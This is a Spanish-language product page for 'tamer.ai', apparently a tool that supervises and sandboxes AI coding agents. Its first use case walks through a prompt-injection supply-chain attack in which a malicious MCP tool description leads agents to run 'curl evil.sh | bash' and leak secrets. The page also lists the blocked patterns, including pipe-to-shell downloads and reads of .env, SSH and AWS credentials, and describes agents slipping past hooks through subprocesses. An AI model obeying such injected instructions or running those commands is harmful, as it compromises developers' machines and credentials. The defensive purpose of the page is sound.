Casos de uso
reales

Los agentes IA son poderosos — pero sin control, son peligrosos. Así protege tamer.ai a equipos reales en escenarios reales.

Ver los casos ↓
CASO 1

Protección Supply Chain

Cómo tamer.ai bloquea ataques supply chain que explotan agentes IA antes de que lleguen a tu máquina.

El problema

En febrero de 2026, el incidente hackerbot-claw reveló un nuevo vector de ataque: un servidor MCP malicioso publicado como herramienta legítima engañó a agentes IA para ejecutar comandos curl | sh, descargando y ejecutando código arbitrario en las máquinas de los desarrolladores.

El agente seguía las instrucciones de la descripción envenenada — no tenía forma de saber que el payload era malicioso. Miles de máquinas fueron comprometidas antes de que el paquete fuera reportado.

La solución tamer

Detección Download & Execute — bloquea curl | sh, wget | bash y patrones de ejecución encadenada en tiempo real
Protección anti-exfiltración — detecta envíos de archivos, variables de entorno o credenciales a endpoints desconocidos
Protección CI/CD — impide modificaciones no autorizadas en .github/workflows/ y .gitlab-ci.yml
Bloqueo de acceso a credenciales — impide la lectura de .env, claves API y claves SSH, sin importar la intención del agente

Flujo de ataque — con y sin tamer

Sin tamer
Herramienta MCP maliciosa Agente
"Instala esta dependencia"
curl evil.sh | bash
Payload ejecutado libremente
Secrets exfiltrados
Con tamer
Herramienta MCP maliciosa Agente
"Instala esta dependencia"
curl evil.sh | bash
BLOQUEADO: patrón download_exec
Alerta enviada a tu teléfono
CASO 2

Supervisión Multi-Agente

Haz trabajar un equipo de agentes IA en paralelo — con un Master que los coordina y mantiene bajo control.

El problema

Ejecutar múltiples agentes IA en el mismo código lleva al caos: ediciones en conflicto, trabajo duplicado, prompts de aprobación bloqueando tu terminal y cero visibilidad sobre lo que cada agente hace realmente.

Sin coordinación, dos agentes pueden editar el mismo archivo simultáneamente, creando conflictos de merge que ninguno puede resolver. Terminas vigilando cada terminal en vez de entregar código.

La solución tamer

Master Agent — un supervisor IA que orquesta workers, detecta conflictos y gestiona aprobaciones automáticamente
Detección de conflictos — rastrea cada archivo que toca cada worker y alerta antes de que las ediciones colisionen
Pipelines por rol — asigna roles de coder, reviewer, tester. Claude codifica, Gemini testea, Aider revisa — automáticamente
Aprendizaje de patrones — el Master aprende de tus decisiones de aprobación y auto-aprueba patrones seguros la próxima vez

Arquitectura pipeline multi-agente

Master Agent
orquesta • detecta conflictos • aprueba
Claude Code
coder
Gemini CLI
tester
Aider
reviewer
Tu Teléfono
dashboard • aprobar • intervenir
CASO 3

Sandbox a Nivel Kernel

Confina cada agente IA dentro de un perímetro impuesto por el kernel — aunque el agente intente escapar.

El problema

Los hooks a nivel aplicación se pueden evadir. Un agente IA con acceso shell puede lanzar un subproceso Python, abrir archivos directamente o usar llamadas al sistema que saltan completamente tus hooks de seguridad.

Tus claves ~/.ssh, credenciales ~/.aws y archivos .env están todos accesibles — el agente solo necesita conocer la ruta.

La solución tamer

Landlock LSM (Linux) — control de acceso al filesystem a nivel kernel. El agente físicamente no puede leer archivos fuera de su workspace.
seccomp-BPF — filtrado de syscalls bloquea sockets de red, ptrace, mount y escalada de privilegios.
Job Object (Windows) — contención de procesos con límites de recursos y garantía kill-on-close.
Defensa en profundidad — los hooks gestionan el día a día (alertas, aprobaciones). El sandbox kernel es la última muralla que nunca cae.
CASO 4

Motor de Skills

Escribe un skill una vez, úsalo en cualquier agente IA — Claude Code, Cursor, Windsurf o cualquier herramienta CLI.

El problema

Cada agente IA tiene su propio formato de instrucciones: Claude Code usa CLAUDE.md, Cursor usa .cursorrules, Windsurf usa .windsurfrules. Si cambias de agente o usas varios en un pipeline, mantienes el mismo conocimiento en formatos incompatibles.

Los equipos pierden horas duplicando guías de código, checklists de revisión y workflows de debugging en archivos de configuración específicos de cada agente.

La solución tamer

Formato canónico — un archivo Markdown por skill con frontmatter estructurado. Escríbelo una vez, tamer lo transforma para cada agente.
Adaptadores multi-agente — transformadores integrados para Claude Code (inyección CLAUDE.md), Cursor (.cursorrules), Windsurf (.windsurfrules) y fallback genérico.
Gestión por CLItamer skill install, tamer skill list, tamer skill remove. Simple y familiar.
Auto-install — los skills se pueden preinstalar en tamer connect vía config. Todo tu equipo recibe los mismos skills, cada vez.

¿Listo para domar tus agentes?

Tres comandos para protección completa.

$ curl -fsSL https://server.tamer-ai.dev/install.sh | bash
$ tamer init
$ tamer claude